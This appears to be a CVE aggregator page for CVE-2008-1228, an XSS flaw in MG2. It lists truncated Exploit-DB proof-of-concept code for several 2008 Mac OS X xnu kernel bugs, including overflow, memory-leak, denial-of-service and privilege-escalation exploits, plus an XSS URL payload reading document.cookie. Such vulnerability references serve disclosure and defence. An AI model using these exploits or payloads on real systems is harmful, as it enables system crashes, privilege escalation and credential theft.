CVE-2008-1228
published 2008-03-10CVE-2008-1228: Cross-site scripting (XSS) vulnerability in admin.php in MG2 (formerly Minigal) allows remote attackers to inject arbitrary web script or HTML via the list…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.19%
64.0th percentile
Cross-site scripting (XSS) vulnerability in admin.php in MG2 (formerly Minigal) allows remote attackers to inject arbitrary web script or HTML via the list parameter in an import action.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory Leak/Denial of Service
---
/* xnu-macfsstat-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#define LEAK_BUFBYTES(a) (sizeof (struct statfs)*a)
#define LEAK_MACBYTES(a) (sizeof (int)*a)
struct __mac_getfsstat {
char *buf; char _pad[4];
int bufsize; char __pad[4];
char *mac; char ___pad[4];
int macsize; char ____pad[4];
int flags; char _____pad[4];
};
int
main (int argc, char **argv)
{
struct __mac_getfsstat req;
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
memset (&req, 0, sizeof req);
req.buf = (char *) 0xDEADBEEF;
req.bufsize = LEAK_BUFBYTES (65536 * 64);
req.mac = (char *) 0xDEADBEEF;
req.macsize
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1237 Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Denial of Service (PoC)
---
/* xnu-profil-leak.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
/* profil defines */
#define PROFIL_LEAK_NUM 65536 * 128
int
main (int argc, char **argv)
{
char buf[1024];
int i, n;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
printf ("* opening profil, pid: %d...", getpid ());
if ((n = syscall (SYS_profil, &buf, sizeof buf, 0, 1)) < 0)
{
fprintf (stderr, "\n%s: syscall [SYS_profil]: failed: %d\n",
argv[0], n);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("* filling %d-bytes of kernel memory...\n", PROFIL_LEAK_NUM * 32);
fflush (stdout);
for (i = 0; i < PROFIL_LEAK_NUM; i++)
{
if ((n = syscall (SYS_
Exploit-DB
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
exploitdb·2009-03-23
CVE-2009-1238 Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
Apple Mac OSX xnu 1228.x - 'vfssysctl' Local Kernel Denial of Service (PoC)
---
/* xnu-vfssysctl-dos.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
void
hammer (void *arg)
{
char buf[1024 * (255 + 1)];
int n, name[6];
memset (buf, 0, sizeof buf);
while (1)
{
name[0] = CTL_VFS;
name[1] = 17;
name[2] = HFS_SET_PKG_EXTENSIONS;
name[3] = (int) buf;
name[4] = 1024;
name[5] = (rand () % 254) + 1;
n = sysctl (name, 6, NULL, NULL, NULL, 0);
usleep(10);
}
}
int
main (int argc, char **argv)
{
int i, n, tid;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
for (i = 0; i < 4; i++)
{
n = pthread_create (&tid, NULL, hammer, NULL);
if (n < 0)
{
fprintf (stderr, "failed creating ham
Exploit-DB
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
exploitdb·2009-03-23
CVE-2009-1235 Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
---
#!/bin/bash
# * xnu-hfs-fcntl-v2.sh
# *
# * Copyright (c) 2008 by
# *
# * Apple MACOS X 792.0 \n" \
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"
if [ ! -f $EXPFILE ]; then
echo -n "* compiling exploit..."
gcc -Wall $EXPFILE.c -o $EXPFILE 2> /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
if [ ! -f $IMAGE.dmg ]; then
echo -n "* creating diskimage..."
hdiutil create -megabytes 1 -fs HFS+ -volname $IMAGE $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
fi
echo -n "* attaching/mounting diskimage..."
hdiutil attach $IMAGE.dmg > /dev/null
if [ $? != 0 ]; then
echo " failed"
exit $?
else
echo " done"
fi
echo -e "* executing exploit...\n"
./$E
Exploit-DB
MG2 - 'list' Cross-Site Scripting
exploitdb·2008-03-04
CVE-2008-1228 MG2 - 'list' Cross-Site Scripting
MG2 - 'list' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/28098/info
MG2 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)
exploitdb·2008-02-26·CVSS 7.8
CVE-2008-0177 [HIGH] Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)
---
/* xnu-ipv6-ipcomp.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu md typo?).
*
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!m) {
* ->
* md = m_pulldown(m, off, sizeof(*ipcomp), NULL);
* if (!md) {
* (bsd/netinet6/ipcomp_input.c)
*
* curiosly the same bug exists in ipcomp4_input, but an explicit
* check is made to ensure there is enough space for the struct ipcomp.
*
* Note: bug independently found by Shoichi Sakane of the KAME project.
* (FreeBSD 5.5, 4.9.0 & NetBSD 3.1 also vulnerable)
* (http://www.kb.cert.org/vuls/id/110947)
* (https://www.securityfocus.com/bid/27642)
* (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0177)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://w
No writeups or analysis indexed.
2008-03-10
Published